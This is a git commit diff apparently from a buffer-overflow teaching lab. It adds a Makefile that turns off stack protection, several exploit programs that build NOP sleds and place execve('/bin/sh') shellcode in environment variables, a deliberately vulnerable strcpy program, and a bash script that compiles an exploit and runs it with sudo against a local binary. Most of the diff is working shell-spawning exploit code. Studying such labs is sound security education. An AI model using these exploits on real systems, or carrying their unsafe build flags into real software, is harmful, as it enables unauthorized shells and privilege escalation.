update

2020-09-29 12:06:45 -04:00
parent ec6574273b
commit 10e988770d
9 changed files with 297 additions and 3 deletions
@@ -1,7 +1,7 @@
 CC=gcc
 CFLAGS= -z execstack -fno-stack-protector -g

-all: is_valid_html product_register
+all: is_valid_html product_register overflow1 sp vulnerable exploit2 exploit3 exploit4

 is_valid_html: is_valid_html.c
 	$(CC) -o is_valid_html is_valid_html.c $(CFLAGS)
@@ -9,5 +9,23 @@ is_valid_html: is_valid_html.c
 product_register: product_register.c
 	$(CC) -o product_register product_register.c $(CFLAGS)

+overflow1: overflow1.c
+	$(CC) -o overflow1 overflow1.c $(CFLAGS)
+
+sp: sp.c
+	$(CC) -o sp sp.c $(CFLAGS)
+
+vulnerable: vulnerable.c
+	$(CC) -o vulnerable vulnerable.c $(CFLAGS)
+
+exploit2: exploit2.c
+	$(CC) -o exploit2 exploit2.c $(CFLAGS)
+
+exploit3: exploit3.c
+	$(CC) -o exploit3 exploit3.c $(CFLAGS)
+
+exploit4: exploit4.c
+	$(CC) -o exploit4 exploit4.c $(CFLAGS)
+
 clean:
-	rm is_valid_html product_register
+	rm is_valid_html product_register overflow1 sp vulnerable exploit2 exploit3 exploit4
@@ -0,0 +1,47 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+#define DEFAULT_OFFSET                    0
+#define DEFAULT_BUFFER_SIZE             512
+
+char shellcode[] =
+  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
+  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
+  "\x80\xe8\xdc\xff\xff\xff/bin/sh";
+
+unsigned long get_sp(void) {
+   __asm__("movl %esp,%eax");
+}
+
+void main(int argc, char *argv[]) {
+  char *buff, *ptr;
+  long *addr_ptr, addr;
+  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
+  int i;
+
+  if (argc > 1) bsize  = atoi(argv[1]);
+  if (argc > 2) offset = atoi(argv[2]);
+
+  if (!(buff = malloc(bsize))) {
+    printf("Can't allocate memory.\n");
+    exit(0);
+  }
+
+  addr = get_sp() - offset;
+  printf("Using address: 0x%x\n", addr);
+
+  ptr = buff;
+  addr_ptr = (long *) ptr;
+  for (i = 0; i < bsize; i+=4)
+    *(addr_ptr++) = addr;
+
+  ptr += 4;
+  for (i = 0; i < strlen(shellcode); i++)
+    *(ptr++) = shellcode[i];
+
+  buff[bsize - 1] = '\0';
+
+  memcpy(buff,"EGG=",4);
+  putenv(buff);
+  system("/bin/bash");
+}
@@ -0,0 +1,52 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+#define DEFAULT_OFFSET                    0
+#define DEFAULT_BUFFER_SIZE             512
+#define NOP                            0x90
+
+char shellcode[] =
+  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
+  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
+  "\x80\xe8\xdc\xff\xff\xff/bin/sh";
+
+unsigned long get_sp(void) {
+   __asm__("movl %esp,%eax");
+}
+
+void main(int argc, char *argv[]) {
+  char *buff, *ptr;
+  long *addr_ptr, addr;
+  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
+  int i;
+
+  if (argc > 1) bsize  = atoi(argv[1]);
+  if (argc > 2) offset = atoi(argv[2]);
+
+  if (!(buff = malloc(bsize))) {
+    printf("Can't allocate memory.\n");
+    exit(0);
+  }
+
+  addr = get_sp() - offset;
+  printf("Using address: 0x%x\n", addr);
+
+  ptr = buff;
+  addr_ptr = (long *) ptr;
+  for (i = 0; i < bsize; i+=4)
+    *(addr_ptr++) = addr;
+
+  for (i = 0; i < bsize/2; i++)
+    buff[i] = NOP;
+
+  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
+  for (i = 0; i < strlen(shellcode); i++)
+    *(ptr++) = shellcode[i];
+
+  buff[bsize - 1] = '\0';
+
+  memcpy(buff,"EGG=",4);
+  putenv(buff);
+  system("/bin/bash");
+}
+
@@ -0,0 +1,61 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+#define DEFAULT_OFFSET                    0
+#define DEFAULT_BUFFER_SIZE             512
+#define DEFAULT_EGG_SIZE               2048
+#define NOP                            0x90
+
+char shellcode[] =
+  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
+  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
+  "\x80\xe8\xdc\xff\xff\xff/bin/sh";
+
+unsigned long get_esp(void) {
+   __asm__("movl %esp,%eax");
+}
+
+void main(int argc, char *argv[]) {
+  char *buff, *ptr, *egg;
+  long *addr_ptr, addr;
+  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
+  int i, eggsize=DEFAULT_EGG_SIZE;
+
+  if (argc > 1) bsize   = atoi(argv[1]);
+  if (argc > 2) offset  = atoi(argv[2]);
+  if (argc > 3) eggsize = atoi(argv[3]);
+
+
+  if (!(buff = malloc(bsize))) {
+    printf("Can't allocate memory.\n");
+    exit(0);
+  }
+  if (!(egg = malloc(eggsize))) {
+    printf("Can't allocate memory.\n");
+    exit(0);
+  }
+
+  addr = get_esp() - offset;
+  printf("Using address: 0x%x\n", addr);
+
+  ptr = buff;
+  addr_ptr = (long *) ptr;
+  for (i = 0; i < bsize; i+=4)
+    *(addr_ptr++) = addr;
+
+  ptr = egg;
+  for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
+    *(ptr++) = NOP;
+
+  for (i = 0; i < strlen(shellcode); i++)
+    *(ptr++) = shellcode[i];
+
+  buff[bsize - 1] = '\0';
+  egg[eggsize - 1] = '\0';
+
+  memcpy(egg,"EGG=",4);
+  putenv(egg);
+  memcpy(buff,"RET=",4);
+  putenv(buff);
+  //system("/bin/bash");
+}
@@ -25,7 +25,7 @@ int verify_extension(char* fname) {
      break;
    }
  }
-  return strcmp("html", extension);
+  return strncmp("html", extension, 4);
 }
 
 int main(int argc, char ** argv) {
@@ -38,6 +38,7 @@ int main(int argc, char ** argv) {
    printf("Usage: %s <file-to-test>\n", argv[0]);
    return 0;
  }
+
  rv = verify_extension(argv[1]);
  if (rv != 0) {
    printf("Invalid html\n");
@@ -0,0 +1,24 @@
+#include <stdio.h>
+#include <string.h>
+
+char shellcode[] =
+        //"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
+        //"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
+        //"\x80\xe8\xdc\xff\xff\xff/bin/sh";
+        "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
+
+char large_string[128];
+
+void main() {
+  char buffer[96];
+  int i;
+  long *long_ptr = (long *) large_string;
+
+  for (i = 0; i < 32; i++)
+    *(long_ptr + i) = (int) buffer;
+
+  for (i = 0; i < strlen(shellcode); i++)
+    large_string[i] = shellcode[i];
+  printf("%d\n", strlen(shellcode));
+  strcpy(buffer,large_string);
+}
@@ -0,0 +1,8 @@
+#include <stdio.h>
+
+unsigned long get_sp(void) {
+   __asm__("movl %esp,%eax");
+}
+void main() {
+  printf("0x%x\n", get_sp());
+}
@@ -0,0 +1,72 @@
+#!/bin/bash
+
+cat /dev/null > test.c
+
+(
+cat <<EOF
+#include <stdio.h>
+#include <stdlib.h>
+
+#define DEFAULT_OFFSET                    0
+#define DEFAULT_BUFFER_SIZE             512
+#define DEFAULT_EGG_SIZE               2048
+#define NOP                            0x90
+
+char shellcode[] = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
+
+unsigned long get_esp(void) {
+   __asm__("movl %esp,%eax");
+}
+
+void main(int argc, char *argv[]) {
+  char *buff, *ptr, *egg;
+  long *addr_ptr, addr;
+  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
+  int i, eggsize=DEFAULT_EGG_SIZE;
+
+  if (argc > 1) bsize   = atoi(argv[1]);
+  if (argc > 2) offset  = atoi(argv[2]);
+  if (argc > 3) eggsize = atoi(argv[3]);
+
+
+  if (!(buff = malloc(bsize))) {
+    printf("Can't allocate memory.\n");
+    exit(0);
+  }
+  if (!(egg = malloc(eggsize))) {
+    printf("Can't allocate memory.\n");
+    exit(0);
+  }
+
+  addr = get_esp() - offset;
+  printf("Using address: 0x%x\n", addr);
+
+  ptr = buff;
+  addr_ptr = (long *) ptr;
+  for (i = 0; i < bsize; i+=4)
+    *(addr_ptr++) = addr;
+
+  ptr = egg;
+  for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
+    *(ptr++) = NOP;
+
+  for (i = 0; i < strlen(shellcode); i++)
+    *(ptr++) = shellcode[i];
+
+  buff[bsize - 1] = '\0';
+  egg[eggsize - 1] = '\0';
+
+  memcpy(egg,"EGG=",4);
+  putenv(egg);
+  memcpy(buff,"RET=",4);
+  putenv(buff);
+  system("/bin/bash -c \"./is_valid_html .html\$RET\"");
+}
+EOF
+) > exploit.c
+
+gcc -o exploit exploit.c -z execstack -fno-stack-protector -g
+
+sudo ./exploit 26
+
+rm exploit exploit.c
@@ -0,0 +1,11 @@
+#include <stdio.h>
+#include <string.h>
+
+void test(char *test) {
+    char buffer[4];
+    strcpy(buffer, test);
+}
+void main(int argc, char *argv[]) {
+  if (argc > 1)
+      test(argv[1]);
+}